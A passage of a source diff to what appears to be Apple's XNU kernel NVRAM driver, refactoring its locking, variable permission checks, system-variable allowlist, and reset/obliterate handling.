+               IORWLockUnlock(_variableLock);       \
+})
+
+#define NVRAMLOCKASSERTHELD()                                      \
+({                                                                 \
+       if (preemption_enabled() && !panic_active())                \
+               IORWLockAssert(_variableLock, kIORWLockAssertHeld); \
 })
 
+#define NVRAMLOCKASSERTEXCLUSIVE()                                  \
+({                                                                  \
+       if (preemption_enabled() && !panic_active())                 \
+               IORWLockAssert(_variableLock, kIORWLockAssertWrite); \
+})
+
+enum NVRAMPartitionType {
+       kIONVRAMPartitionSystem,
+       kIONVRAMPartitionCommon
+};
+
 typedef struct {
-       const char                *name;
+       NVRAMPartitionType        type;
        UInt32                    offset;
        UInt32                    size;
        OSSharedPtr<OSDictionary> &dict;
@@ -147,130 +164,29 @@ UUID_DEFINE(gAppleSystemVariableGuid, 0x40, 0xA0, 0xDD, 0xD2, 0x77, 0xF8, 0x43,
 UUID_DEFINE(gAppleNVRAMGuid, 0x7C, 0x43, 0x61, 0x10, 0xAB, 0x2A, 0x4B, 0xBB, 0xA8, 0x80, 0xFE, 0x41, 0x99, 0x5C, 0x9F, 0x82);
 
 static bool gNVRAMLogging = false;
+static bool gInternalBuild = false;
 
 // allowlist variables from macboot that need to be set/get from system region if present
 static const char * const gNVRAMSystemList[] = {
-       "adbe-tunable",
-       "adbe-tunables",
-       "adfe-tunables",
-       "alamo-path",
-       "alt-boot-volume",
-       "ASMB",
-       "atc0",
-       "atc1",
+       "allow-root-hash-mismatch",
        "auto-boot",
        "auto-boot-halt-stage",
-       "auto-boot-once",
-       "auto-boot-usb",
-       "auxkc-path",
-       "backlight-level",
-       "backlight-nits",
        "base-system-path",
        "boot-args",
-       "boot-breadcrumbs",
        "boot-command",
-       "boot-device",
        "boot-image",
-       "boot-partition",
-       "boot-path",
-       "boot-ramdisk",
-       "boot-script",
-       "boot-volume",
        "bootdelay",
-       "bt1addr",
-       "btaddr",
-       "cam-use-ext-ldo",
-       "CLCG_override",
        "com.apple.System.boot-nonce",
-       "com.apple.System.rtc-offset",
-       "com.apple.System.tz0-size",
-       "core-bin-offset",
-       "cpu-bin-offset",
        "darkboot",
-       "DClr_override",
-       "dcp-auto-boot",
-       "debug-gg",
-       "debug-soc",
-       "debug-uarts",
-       "diags-path",
-       "disable-boot-wdt",
-       "display-color-space",
-       "display-timing",
-       "display-vsh-comp",
-       "dpcd-max-brightness",
-       "dtdump",
-       "dtdump-path",
-       "e75",
        "emu",
-       "enable-auth-debug",
-       "enable-jop",
-       "enable-marconi",
-       "enable-upgrade-fallback",
-       "enforce-iuob",
-       "eth1addr",
-       "ethaddr",
-       "failboot-breadcrumbs",
-       "fixed-lcm-boost",
-       "force-ctrr-lock",
-       "force-upgrade-fail",
-       "fuos-path",
-       "hib-ui-force",
-       "hibhack-test-hmac",
-       "iboot-data",
-       "iboot-failure-reason",
-       "iboot-failure-reason-str",
-       "iboot-failure-volume",
-       "iboot1-precommitted",
-       "idle-off",
-       "is-tethered",
-       "kaslr-off",
-       "kaslr-slide",
-       "kis-rsm",
-       "knobs",
-       "loadaddr",
-       "memmapdump",
-       "mipi-bridge-cmd-verify",
-       "mipi-bridge-poll-cmd-fifo",
-       "no-ctrr",
-       "one-time-boot-command",
-       "osenvironment",
-       "ota-breadcrumbs",
-       "ota-outcome",
-       "panicmedic",
-       "panicmedic-threshold",
-       "panicmedic-timestamps",
-       "phleet-path",
-       "pinot-panel-id",
-       "pintoaddr",
+       "one-time-boot-command", // Needed for diags customer install flows
        "policy-nonce-digests",
-       "preserve-debuggability",
        "prevent-restores", // Keep for factory <rdar://problem/70476321>
        "prev-lang:kbd",
-       "ramrod-kickstart-aces",
-       "rbdaddr0",
-       "rbm-path",
-       "reconfig-behavior",
-       "reconfig-breakpoints",
-       "recovery-boot-mode",
-       "recovery-breadcrumbs",
-       "restored-host-timeout",
        "root-live-fs",
-       "rtos-path",
-       "soc-bin-offset",
-       "StartupMute",
-       "StartupMuteAccessibility",
-       "storage-prev-assert",
-       "storage-prev-assert-stored",
-       "summit-panel-id",
        "SystemAudioVolume",
        "SystemAudioVolumeExtension",
        "SystemAudioVolumeSaved",
-       "tz0-size-override",
-       "upgrade-fallback-boot-command",
-       "upgrade-retry",
-       "usb-enabled",
-       "wifi1addr",
-       "wifiaddr",
        nullptr
 };
 
@@ -361,7 +277,7 @@ VariablePermissionEntry gVariablePermissions[] = {
         .p.Bits.NeverAllowedToDelete = 1},
        {"boot-image", .p.Bits.UserWrite = 1},
        {"com.apple.System.fp-state", .p.Bits.KernelOnly = 1},
-       {"policy-nonce-digests", .p.Bits.ResetNVRAMOnlyDelete = 1},
+       {"policy-nonce-digests", .p.Bits.ResetNVRAMOnlyDelete = 1}, // Deleting this via user triggered obliterate leave J273a unable to boot
        {"security-password", .p.Bits.RootRequired = 1},
 
 #if !defined(__x86_64__)
@@ -369,6 +285,7 @@ VariablePermissionEntry gVariablePermissions[] = {
        {"acc-cm-override-count", .p.Bits.KernelOnly = 1},
        {"acc-mb-ld-lifetime", .p.Bits.KernelOnly = 1},
        {"backlight-level", .p.Bits.UserWrite = 1},
+       {"backlight-nits", .p.Bits.UserWrite = 1},
        {"com.apple.System.boot-nonce", .p.Bits.KernelOnly = 1},
        {"com.apple.System.sep.art", .p.Bits.KernelOnly = 1},
        {"darkboot", .p.Bits.UserWrite = 1},
@@ -445,11 +362,33 @@ verifyWriteSizeLimit(const uuid_t *varGuid, const char *variableName, size_t pro
        return true;
 }
 
+#if defined(DEBUG) || defined(DEVELOPMENT)
+static const char *
+getNVRAMOpString(IONVRAMOperation op)
+{
+       switch (op) {
+       case kIONVRAMOperationRead:
+               return "Read";
+       case kIONVRAMOperationWrite:
+               return "Write";
+       case kIONVRAMOperationDelete:
+               return "Delete";
+       case kIONVRAMOperationObliterate:
+               return "Obliterate";
+       case kIONVRAMOperationReset:
+               return "Reset";
+       default:
+               return "Unknown";
+       }
+}
+#endif
+
 static bool
 verifyPermission(IONVRAMOperation op, const uuid_t *varGuid, const char *varName)
 {
        VariablePermission perm;
-       bool kernel, admin, writeEntitled, readEntitled, allowList, systemGuid, systemEntitled;
+       bool kernel, admin, writeEntitled, readEntitled, allowList, systemGuid, systemEntitled, systemInternalEntitled, systemAllow;
+       bool ok = false;
 
        perm = getVariablePermission(varName);
 
@@ -457,20 +396,24 @@ verifyPermission(IONVRAMOperation op, const uuid_t *varGuid, const char *varName
 
        if (perm.Bits.KernelOnly) {
                DEBUG_INFO("KernelOnly access for %s, kernel=%d\n", varName, kernel);
-               return kernel;
+               ok = kernel;
+               goto exit;
        }
 
-       allowList = variableInAllowList(varName);
-       systemGuid = uuid_compare(*varGuid, gAppleSystemVariableGuid) == 0;
-       admin = IOUserClient::clientHasPrivilege(current_task(), kIONVRAMPrivilege) == kIOReturnSuccess;
-       writeEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMWriteAccessKey);
-       readEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMReadAccessKey);
-       systemEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMSystemAllowKey) || kernel;
+       allowList              = variableInAllowList(varName);
+       systemGuid             = uuid_compare(*varGuid, gAppleSystemVariableGuid) == 0;
+       admin                  = IOUserClient::clientHasPrivilege(current_task(), kIONVRAMPrivilege) == kIOReturnSuccess;
+       writeEntitled          = IOTaskHasEntitlement(current_task(), kIONVRAMWriteAccessKey);
+       readEntitled           = IOTaskHasEntitlement(current_task(), kIONVRAMReadAccessKey);
+       systemEntitled         = IOTaskHasEntitlement(current_task(), kIONVRAMSystemAllowKey);
+       systemInternalEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMSystemInternalAllowKey);
+
+       systemAllow = systemEntitled || (systemInternalEntitled && gInternalBuild) || kernel;
 
        switch (op) {
        case kIONVRAMOperationRead:
                if (kernel || admin || readEntitled || perm.Bits.FullAccess) {
-                       return true;
+                       ok = true;
                }
                break;
 
@@ -478,15 +421,15 @@ verifyPermission(IONVRAMOperation op, const uuid_t *varGuid, const char *varName
                if (kernel || perm.Bits.UserWrite || admin || writeEntitled) {
                        if (systemGuid) {
                                if (allowList) {
-                                       if (!systemEntitled) {
+                                       if (!systemAllow) {
                                                DEBUG_ERROR("Allowed write to system region when NOT entitled for %s\n", varName);
                                        }
-                               } else if (!systemEntitled) {
+                               } else if (!systemAllow) {
                                        DEBUG_ERROR("Not entitled for system region writes for %s\n", varName);
                                        break;
                                }
                        }
-                       return true;
+                       ok = true;
                }
                break;
 
@@ -499,27 +442,31 @@ verifyPermission(IONVRAMOperation op, const uuid_t *varGuid, const char *varName
                } else if ((op == kIONVRAMOperationObliterate) && perm.Bits.ResetNVRAMOnlyDelete) {
                        DEBUG_INFO("Not allowed to obliterate %s\n", varName);
                        break;
+               } else if ((op == kIONVRAMOperationDelete) && perm.Bits.ResetNVRAMOnlyDelete) {
+                       DEBUG_INFO("Only allowed to delete %s via NVRAM reset\n", varName);
+                       break;
                }
 
                if (kernel || perm.Bits.UserWrite || admin || writeEntitled) {
                        if (systemGuid) {
                                if (allowList) {
-                                       if (!systemEntitled) {
+                                       if (!systemAllow) {
                                                DEBUG_ERROR("Allowed delete to system region when NOT entitled for %s\n", varName);
                                        }
-                               } else if (!systemEntitled) {
+                               } else if (!systemAllow) {
                                        DEBUG_ERROR("Not entitled for system region deletes for %s\n", varName);
                                        break;
                                }
                        }
-                       return true;
+                       ok = true;
                }
                break;
        }
 
-       DEBUG_INFO("Permission for %s denied, kernel=%d, admin=%d, writeEntitled=%d, readEntitled=%d, systemGuid=%d, systemEntitled=%d\n",
-           varName, kernel, admin, writeEntitled, readEntitled, systemGuid, systemEntitled);
-       return false;
+exit:
+       DEBUG_INFO("Permission for %s of %s %s: kernel=%d, admin=%d, writeEntitled=%d, readEntitled=%d, systemGuid=%d, systemEntitled=%d, systemInternalEntitled=%d, UserWrite=%d\n",
+           getNVRAMOpString(op), varName, ok ? "granted" : "denied", kernel, admin, writeEntitled, readEntitled, systemGuid, systemEntitled, systemInternalEntitled, perm.Bits.UserWrite);
+       return ok;
 }
 
 static bool
@@ -540,7 +487,7 @@ parseVariableName(const char *key, uuid_t *guidResult, const char **nameResult)
 {
        uuid_string_t temp    = {0};
        size_t        keyLen  = strlen(key);
-       bool          result  = false;
+       bool          ok      = false;
        const char    *name   = key;
        uuid_t        guid;
 
@@ -551,12 +498,12 @@ parseVariableName(const char *key, uuid_t *guidResult, const char **nameResult)
                if ((uuid_parse(temp, guid) == 0) &&
                    (key[sizeof(temp) - 1] == ':')) {
                        name = key + sizeof(temp);
-                       result = true;
+                       ok     = true;
                }
        }
 
        if (guidResult) {
-               result ? uuid_copy(*guidResult, guid) : uuid_copy(*guidResult, gAppleNVRAMGuid);
+               ok ? uuid_copy(*guidResult, guid) : uuid_copy(*guidResult, gAppleNVRAMGuid);
        }
        if (nameResult) {
                *nameResult = name;
@@ -565,6 +512,19 @@ parseVariableName(const char *key, uuid_t *guidResult, const char **nameResult)
        return false;
 }
 
+static bool
+skipKey(const OSSymbol *aKey)
+{
+       return aKey->isEqualTo(kIOClassNameOverrideKey) ||
+              aKey->isEqualTo(kIOBSDNameKey) ||
+              aKey->isEqualTo(kIOBSDNamesKey) ||
+              aKey->isEqualTo(kIOBSDMajorKey) ||
+              aKey->isEqualTo(kIOBSDMinorKey) ||
+              aKey->isEqualTo(kIOBSDUnitKey);
+}
+
+// ************************** IODTNVRAMVariables ****************************
+
 // private IOService based class for publishing distinct dictionary properties on
 // for easy ioreg access since the serializeProperties call is overloaded and is used
 // as variable access
@@ -573,14 +533,20 @@ class IODTNVRAMVariables : public IOService
        OSDeclareDefaultStructors(IODTNVRAMVariables)
 private:
        IODTNVRAM        *_provider;
-       OSDictionary     *_properties;
+       OSDictionary     *_variables;
        uuid_t           _guid;
 
 public:
-       bool             init(const uuid_t *guid);
-       virtual bool     start(IOService * provider) APPLE_KEXT_OVERRIDE;
-       virtual IOReturn setProperties(OSObject * properties) APPLE_KEXT_OVERRIDE;
-       virtual bool     serializeProperties(OSSerialize *s) const APPLE_KEXT_OVERRIDE;
+       bool                    init(const uuid_t *guid);
+       virtual bool            start(IOService * provider) APPLE_KEXT_OVERRIDE;
+       virtual IOReturn        setVariables(OSObject * properties);
+
+       virtual bool            serializeProperties(OSSerialize *s) const APPLE_KEXT_OVERRIDE;
+       virtual OSPtr<OSObject> copyProperty(const OSSymbol *aKey) const APPLE_KEXT_OVERRIDE;
+       virtual OSObject        *getProperty(const OSSymbol *aKey) const APPLE_KEXT_OVERRIDE;
+       virtual bool            setProperty(const OSSymbol *aKey, OSObject *anObject) APPLE_KEXT_OVERRIDE;
+       virtual IOReturn        setProperties(OSObject *properties) APPLE_KEXT_OVERRIDE;
+       virtual void            removeProperty(const OSSymbol *aKey) APPLE_KEXT_OVERRIDE;
 };
 
 OSDefineMetaClassAndStructors(IODTNVRAMVariables, IOService)
@@ -588,23 +554,30 @@ OSDefineMetaClassAndStructors(IODTNVRAMVariables, IOService)
 bool
 IODTNVRAMVariables::init(const uuid_t *guid)
 {
-       require(super::init(), error);
-       require(guid, error);
+       if (!super::init()) {
+               return false;
+       }
+
+       if (guid == nullptr) {
+               return false;
+       }
 
        uuid_copy(_guid, *guid);
 
        return true;
-
-error:
-       return false;
 }
 
 bool
 IODTNVRAMVariables::start(IOService * provider)
 {
-       require(IOService::start(provider), error);
+       if (!IOService::start(provider)) {
+               goto error;
+       }
 
-       require(_provider = OSDynamicCast(IODTNVRAM, provider), error);
+       _provider = OSDynamicCast(IODTNVRAM, provider);
+       if (_provider == nullptr) {
+               goto error;
+       }
 
        registerService();
 
@@ -617,15 +590,15 @@ error:
 }
 
 IOReturn
-IODTNVRAMVariables::setProperties(OSObject * properties)
+IODTNVRAMVariables::setVariables(OSObject * variables)
 {
-       if (OSDynamicCast(OSDictionary, properties)) {
-               OSSafeReleaseNULL(_properties);
-               _properties = OSDynamicCast(OSDictionary, properties);
-               properties->retain();
+       if (OSDynamicCast(OSDictionary, variables)) {
+               OSSafeReleaseNULL(_variables);
+               _variables = OSDynamicCast(OSDictionary, variables);
+               variables->retain();
        }
 
-       return IOService::setProperties(properties);
+       return kIOReturnSuccess;
 }
 
 bool
@@ -634,30 +607,123 @@ IODTNVRAMVariables::serializeProperties(OSSerialize *s) const
        const OSSymbol                    *key;
        OSSharedPtr<OSDictionary>         dict;
        OSSharedPtr<OSCollectionIterator> iter;
-       OSSharedPtr<OSDictionary>         localProperties(_properties, OSRetain);
-       bool                              result = false;
+       OSSharedPtr<OSDictionary>         localVariables(_variables, OSRetain);
+       bool                              ok = false;
 
-       require(localProperties != nullptr, exit);
+       if (localVariables == nullptr) {
+               goto exit;
+       }
 
-       dict = OSDictionary::withCapacity(localProperties->getCount());
-       require_action(dict, exit, DEBUG_ERROR("No dictionary\n"));
+       dict = OSDictionary::withCapacity(localVariables->getCount());
+       if (dict == nullptr) {
+               DEBUG_ERROR("No dictionary\n");
+               goto exit;
+       }
 
-       iter = OSCollectionIterator::withCollection(localProperties.get());
-       require_action(iter, exit, DEBUG_ERROR("failed to create iterator\n"));
+       iter = OSCollectionIterator::withCollection(localVariables.get());
+       if (iter == nullptr) {
+               DEBUG_ERROR("failed to create iterator\n");
+               goto exit;
+       }
 
        while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) {
                if (verifyPermission(kIONVRAMOperationRead, &_guid, key)) {
-                       dict->setObject(key, localProperties->getObject(key));
+                       dict->setObject(key, localVariables->getObject(key));
                }
        }
 
-       result = dict->serialize(s);
+       ok = dict->serialize(s);
 
 exit:
-       DEBUG_INFO("result=%d\n", result);
-       return result;
+       DEBUG_INFO("ok=%d\n", ok);
+       return ok;
+}
+
+OSPtr<OSObject>
+IODTNVRAMVariables::copyProperty(const OSSymbol *aKey) const
+{
+       if (_provider && !skipKey(aKey)) {
+               DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy());
+
+               return _provider->copyPropertyWithGUIDAndName(&_guid, aKey->getCStringNoCopy());
+       } else {
+               return nullptr;
+       }
 }
 
+OSObject *
+IODTNVRAMVariables::getProperty(const OSSymbol *aKey) const
+{
+       OSSharedPtr<OSObject> theObject = copyProperty(aKey);
+
+       return theObject.get();
+}
+
+bool
+IODTNVRAMVariables::setProperty(const OSSymbol *aKey, OSObject *anObject)
+{
+       if (_provider) {
+               return _provider->setPropertyWithGUIDAndName(&_guid, aKey->getCStringNoCopy(), anObject);
+       } else {
+               return false;
+       }
+}
+
+IOReturn
+IODTNVRAMVariables::setProperties(OSObject *properties)
+{
+       IOReturn                          ret = kIOReturnSuccess;
+       OSObject                          *object;
+       const OSSymbol                    *key;
+       OSDictionary                      *dict;
+       OSSharedPtr<OSCollectionIterator> iter;
+
+       if (_provider) {
+               dict = OSDynamicCast(OSDictionary, properties);
+               if (dict == nullptr) {
+                       DEBUG_ERROR("Not a dictionary\n");
+                       return kIOReturnBadArgument;
+               }
+
+               iter = OSCollectionIterator::withCollection(dict);
+               if (iter == nullptr) {
+                       DEBUG_ERROR("Couldn't create iterator\n");
+                       return kIOReturnBadArgument;
+               }
+
+               while (ret == kIOReturnSuccess) {
+                       key = OSDynamicCast(OSSymbol, iter->getNextObject());
+                       if (key == nullptr) {
+                               break;
+                       }
+
+                       object = dict->getObject(key);
+                       if (object == nullptr) {
+                               continue;
+                       }
+
+                       ret = setProperty(key, object);
+               }
+       } else {
+               ret = kIOReturnNotReady;
+       }
+
+       DEBUG_INFO("ret=%#08x\n", ret);
+
+       return ret;
+}
+
+void
+IODTNVRAMVariables::removeProperty(const OSSymbol *aKey)
+{
+       if (_provider) {
+               _provider->removePropertyWithGUIDAndName(&_guid, aKey->getCStringNoCopy());
+       }
+}
+
+
+// **************************** IODTNVRAM *********************************
+
 bool
 IODTNVRAM::init(IORegistryEntry *old, const IORegistryPlane *plane)
 {
@@ -667,7 +733,17 @@ IODTNVRAM::init(IORegistryEntry *old, const IORegistryPlane *plane)
                return false;
        }
 
-       _variableLock = IOLockAlloc();
+       PE_parse_boot_argn("nvram-log", &gNVRAMLogging, sizeof(gNVRAMLogging));
+
+#if XNU_TARGET_OS_OSX
+#if CONFIG_CSR
+       gInternalBuild = (csr_check(CSR_ALLOW_APPLE_INTERNAL) == 0);
+#endif // CONFIG_CSR
+#endif // XNU_TARGET_OS_OSX
+
+       DEBUG_INFO("gInternalBuild = %d\n", gInternalBuild);
+
+       _variableLock = IORWLockAlloc();
        if (!_variableLock) {
                return false;
        }
@@ -677,8 +753,6 @@ IODTNVRAM::init(IORegistryEntry *old, const IORegistryPlane *plane)
                return false;
        }
 
-       PE_parse_boot_argn("nvram-log", &gNVRAMLogging, sizeof(gNVRAMLogging));
-
        dict =  OSDictionary::withCapacity(1);
        if (dict == nullptr) {
                return false;
@@ -789,12 +863,14 @@ IODTNVRAM::registerNVRAMController(IONVRAMController *nvram)
 
        DEBUG_INFO("setting controller\n");
 
+       CONTROLLERLOCK();
        _nvramController = nvram;
+       CONTROLLERUNLOCK();
 
        // <rdar://problem/9529235> race condition possible between
        // IODTNVRAM and IONVRAMController (restore loses boot-args)
        if (!_isProxied) {
-               DEBUG_INFO("Proxied NVRAM data\n");
+               DEBUG_INFO("Reading non-proxied NVRAM data\n");
                _nvramController->read(0, _nvramImage, _nvramSize);
                initNVRAMImage();
        }
@@ -850,7 +926,7 @@ no_system:
 
 no_common:
        ret = serializeVariables();
-       DEBUG_INFO("serializeVariables ret=0x%08x\n", ret);
+       DEBUG_INFO("serializeVariables ret=%#08x\n", ret);
 }
 
 void
@@ -867,8 +943,11 @@ IODTNVRAM::initNVRAMImage(void)
        while (currentOffset < _nvramSize) {
                bool common_partition;
                bool system_partition;
-
                chrp_nvram_header_t * header = (chrp_nvram_header_t *)(_nvramImage + currentOffset);
+               const uint8_t common_v1_name[sizeof(header->name)] = {NVRAM_CHRP_PARTITION_NAME_COMMON_V1};
+               const uint8_t common_v2_name[sizeof(header->name)] = {NVRAM_CHRP_PARTITION_NAME_COMMON_V2};
+               const uint8_t system_v1_name[sizeof(header->name)] = {NVRAM_CHRP_PARTITION_NAME_SYSTEM_V1};
+               const uint8_t system_v2_name[sizeof(header->name)] = {NVRAM_CHRP_PARTITION_NAME_SYSTEM_V2};
 
                currentLength = header->len * NVRAM_CHRP_LENGTH_BLOCK_SIZE;
 
@@ -883,9 +962,10 @@ IODTNVRAM::initNVRAMImage(void)
                        break;
                }
 
-               common_partition = memcmp(header->name, NVRAM_CHRP_PARTITION_NAME_COMMON, strlen(NVRAM_CHRP_PARTITION_NAME_COMMON)) == 0;
-               system_partition = (memcmp(header->name, NVRAM_CHRP_PARTITION_NAME_SYSTEM, strlen(NVRAM_CHRP_PARTITION_NAME_SYSTEM)) == 0) ||
-                   (memcmp(header->name, NVRAM_CHRP_PARTITION_NAME_SYSTEM_LEGACY, strlen(NVRAM_CHRP_PARTITION_NAME_SYSTEM_LEGACY)) == 0);
+               common_partition = (memcmp(header->name, common_v1_name, sizeof(header->name)) == 0) ||
+                   (memcmp(header->name, common_v2_name, sizeof(header->name)) == 0);
+               system_partition = (memcmp(header->name, system_v1_name, sizeof(header->name)) == 0) ||
+                   (memcmp(header->name, system_v2_name, sizeof(header->name)) == 0);
 
                if (common_partition) {
                        _commonPartitionOffset = partitionOffset;
@@ -897,8 +977,8 @@ IODTNVRAM::initNVRAMImage(void)
                        OSSharedPtr<OSNumber> partitionOffsetNumber, partitionLengthNumber;
 
                        // Construct the partition ID from the signature and name.
-                       snprintf(partitionID, sizeof(partitionID), "0x%02x,", header->sig);
-                       strncpy(partitionID + 5, header->name, sizeof(header->name));
+                       snprintf(partitionID, sizeof(partitionID), "%#02x,", header->sig);
+                       memcpy(partitionID + 5, header->name, sizeof(header->name));
                        partitionID[17] = '\0';
 
                        partitionOffsetNumber = OSNumber::withNumber(partitionOffset, 32);
@@ -919,7 +999,7 @@ IODTNVRAM::initNVRAMImage(void)
                _systemImage = _nvramImage + _systemPartitionOffset;
        }
 
-       DEBUG_ALWAYS("NVRAM : ofPartitionOffset - 0x%x, ofPartitionSize - 0x%x, systemPartitionOffset - 0x%x, systemPartitionSize - 0x%x\n",
+       DEBUG_ALWAYS("NVRAM : commonPartitionOffset - %#x, commonPartitionSize - %#x, systemPartitionOffset - %#x, systemPartitionSize - %#x\n",
            (unsigned int) _commonPartitionOffset, (unsigned int) _commonPartitionSize, (unsigned int) _systemPartitionOffset, (unsigned int) _systemPartitionSize);
 
        _lastDeviceSync = 0;
@@ -963,10 +1043,10 @@ IODTNVRAM::serializeProperties(OSSerialize *s) const
        const OSSymbol                    *key;
        OSSharedPtr<OSDictionary>         systemDict, commonDict, dict;
        OSSharedPtr<OSCollectionIterator> iter;
-       bool                              result = false;
+       bool                              ok = false;
        unsigned int                      totalCapacity = 0;
 
-       NVRAMLOCK();
+       NVRAMREADLOCK();
        if (_commonDict) {
                commonDict = OSDictionary::withDictionary(_commonDict.get());
        }
@@ -1021,12 +1101,12 @@ IODTNVRAM::serializeProperties(OSSerialize *s) const
                }
        }
 
-       result = dict->serialize(s);
+       ok = dict->serialize(s);
 
 exit:
-       DEBUG_INFO("result=%d\n", result);
+       DEBUG_INFO("ok=%d\n", ok);
 
-       return result;
+       return ok;
 }
 
 IOReturn
@@ -1048,89 +1128,89 @@ IODTNVRAM::chooseDictionary(IONVRAMOperation operation, const uuid_t *varGuid, c
                        DEBUG_INFO("Using common dictionary\n");
                        *dict = _commonDict.get();
                }
-       } else {
+               return kIOReturnSuccess;
+       } else if (_commonDict != nullptr) {
                DEBUG_INFO("Defaulting to common dictionary\n");
                *dict = _commonDict.get();
+               return kIOReturnSuccess;
        }
 
-       return kIOReturnSuccess;
+       return kIOReturnNotFound;
 }
 
-bool
-IODTNVRAM::handleSpecialVariables(const char *name, uuid_t *guid, OSObject *obj, IOReturn *error)
+IOReturn
+IODTNVRAM::flushDict(const uuid_t *guid, IONVRAMOperation op)
 {
        IOReturn err = kIOReturnSuccess;
-       bool special = false;
 
-       NVRAMLOCKASSERT();
+       if ((_systemDict != nullptr) && (uuid_compare(*guid, gAppleSystemVariableGuid) == 0)) {
+               const OSSymbol *key;
+               OSSharedPtr<OSDictionary> newDict;
+               OSSharedPtr<OSCollectionIterator> iter;
 
-       if (strcmp(name, "ResetNVRam") == 0) {
-               DEBUG_INFO("%s requested\n", name);
+               newDict = OSDictionary::withCapacity(_systemDict->getCapacity());
+               iter = OSCollectionIterator::withCollection(_systemDict.get());
+               if ((newDict == nullptr) || (iter == nullptr)) {
+                       err = kIOReturnNoMemory;
+                       goto exit;
+               }
 
-               if (uuid_compare(*guid, gAppleSystemVariableGuid) == 0) {
-                       if (_systemDict != nullptr) {
-                               _systemDict->flushCollection();
+               while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) {
+                       if (!verifyPermission(op, &gAppleSystemVariableGuid, key)) {
+                               newDict->setObject(key, _systemDict->getObject(key));
                        }
-
-                       _commonDict->flushCollection();
-                       DEBUG_INFO("system & common dictionary flushed\n");
                }
 
-               special = true;
-       } else if (strcmp(name, "ObliterateNVRam") == 0) {
-               DEBUG_INFO("%s requested\n", name);
+               _systemDict = newDict;
 
-               if ((_systemDict != nullptr) && (uuid_compare(*guid, gAppleSystemVariableGuid) == 0)) {
-                       const OSSymbol *key;
-                       OSSharedPtr<OSDictionary> newDict;
-                       OSSharedPtr<OSCollectionIterator> iter;
+               DEBUG_INFO("system dictionary flushed\n");
+       } else if ((_commonDict != nullptr) && (uuid_compare(*guid, gAppleNVRAMGuid) == 0)) {
+               const OSSymbol *key;
+               OSSharedPtr<OSDictionary> newDict;
+               OSSharedPtr<OSCollectionIterator> iter;
 
-                       newDict = OSDictionary::withCapacity(_systemDict->getCapacity());
-                       iter = OSCollectionIterator::withCollection(newDict.get());
-                       if ((newDict == nullptr) || (iter == nullptr)) {
-                               err = kIOReturnNoMemory;
-                               goto exit;
-                       }
-
-                       while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) {
-                               const OSSymbol *key = OSDynamicCast(OSSymbol, iter->getNextObject());
-                               if (key == nullptr) {
-                                       err = kIOReturnNoMemory;
-                                       goto exit;
-                               }
+               newDict = OSDictionary::withCapacity(_commonDict->getCapacity());
+               iter = OSCollectionIterator::withCollection(_commonDict.get());
+               if ((newDict == nullptr) || (iter == nullptr)) {
+                       err = kIOReturnNoMemory;
+                       goto exit;
+               }
 
-                               if (!verifyPermission(kIONVRAMOperationObliterate, &gAppleSystemVariableGuid, key)) {
-                                       newDict->setObject(key, _systemDict->getObject(key));
-                               }
+               while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) {
+                       if (!verifyPermission(op, &gAppleNVRAMGuid, key)) {
+                               newDict->setObject(key, _commonDict->getObject(key));
                        }
+               }
 
-                       _systemDict = newDict;
+               _commonDict = newDict;
 
-                       DEBUG_INFO("system dictionary flushed\n");
-               } else if (_commonDict != nullptr) {
-                       const OSSymbol *key;
-                       OSSharedPtr<OSDictionary> newDict;
-                       OSSharedPtr<OSCollectionIterator> iter;
+               DEBUG_INFO("common dictionary flushed\n");
+       }
 
-                       newDict = OSDictionary::withCapacity(_commonDict->getCapacity());
-                       iter = OSCollectionIterator::withCollection(newDict.get());
-                       if ((newDict == nullptr) || (iter == nullptr)) {
-                               err = kIOReturnNoMemory;
-                               goto exit;
-                       }
+exit:
+       return err;
+}
 
-                       while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) {
-                               if (!verifyPermission(kIONVRAMOperationObliterate, &gAppleNVRAMGuid, key)) {
-                                       newDict->setObject(key, _commonDict->getObject(key));
-                               }
-                       }
+bool
+IODTNVRAM::handleSpecialVariables(const char *name, const uuid_t *guid, const OSObject *obj, IOReturn *error)
+{
+       IOReturn err = kIOReturnSuccess;
+       bool special = false;
 
-                       _commonDict = newDict;
+       NVRAMLOCKASSERTEXCLUSIVE();
 
-                       DEBUG_INFO("common dictionary flushed\n");
+       // ResetNVRam flushes both regions in one call
+       // Obliterate can flush either separately
+       if (strcmp(name, "ObliterateNVRam") == 0) {
+               err = flushDict(guid, kIONVRAMOperationObliterate);
+       } else if (strcmp(name, "ResetNVRam") == 0) {
+               err = flushDict(&gAppleSystemVariableGuid, kIONVRAMOperationReset);
+
+               if (err != kIOReturnSuccess) {
+                       goto exit;
                }
 
-               special = true;
+               err = flushDict(&gAppleNVRAMGuid, kIONVRAMOperationReset);
        }
 
 exit:
@@ -1142,39 +1222,25 @@ exit:
 }
 
 OSSharedPtr<OSObject>
-IODTNVRAM::copyProperty(const OSSymbol *aKey) const
+IODTNVRAM::copyPropertyWithGUIDAndName(const uuid_t *guid, const char *name) const
 {
        IOReturn              result;
-       const char            *variableName;
-       uuid_t                varGuid;
        OSDictionary          *dict;
        OSSharedPtr<OSObject> theObject = nullptr;
 
-       if (aKey->isEqualTo(kIOBSDNameKey) ||
-           aKey->isEqualTo(kIOBSDNamesKey) ||
-           aKey->isEqualTo(kIOBSDMajorKey) ||
-           aKey->isEqualTo(kIOBSDMinorKey) ||
-           aKey->isEqualTo(kIOBSDUnitKey)) {
-               // These will never match.
-               // Check here and exit to avoid logging spam
-               return nullptr;
-       }
-       DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy());
-
-       parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName);
-
-       result = chooseDictionary(kIONVRAMOperationRead, &varGuid, variableName, &dict);
+       result = chooseDictionary(kIONVRAMOperationRead, guid, name, &dict);
        if (result != kIOReturnSuccess) {
+               DEBUG_INFO("No dictionary\n");
                goto exit;
        }
 
-       if (!verifyPermission(kIONVRAMOperationRead, &varGuid, variableName)) {
+       if (!verifyPermission(kIONVRAMOperationRead, guid, name)) {
                DEBUG_INFO("Not privileged\n");
                goto exit;
        }
 
-       NVRAMLOCK();
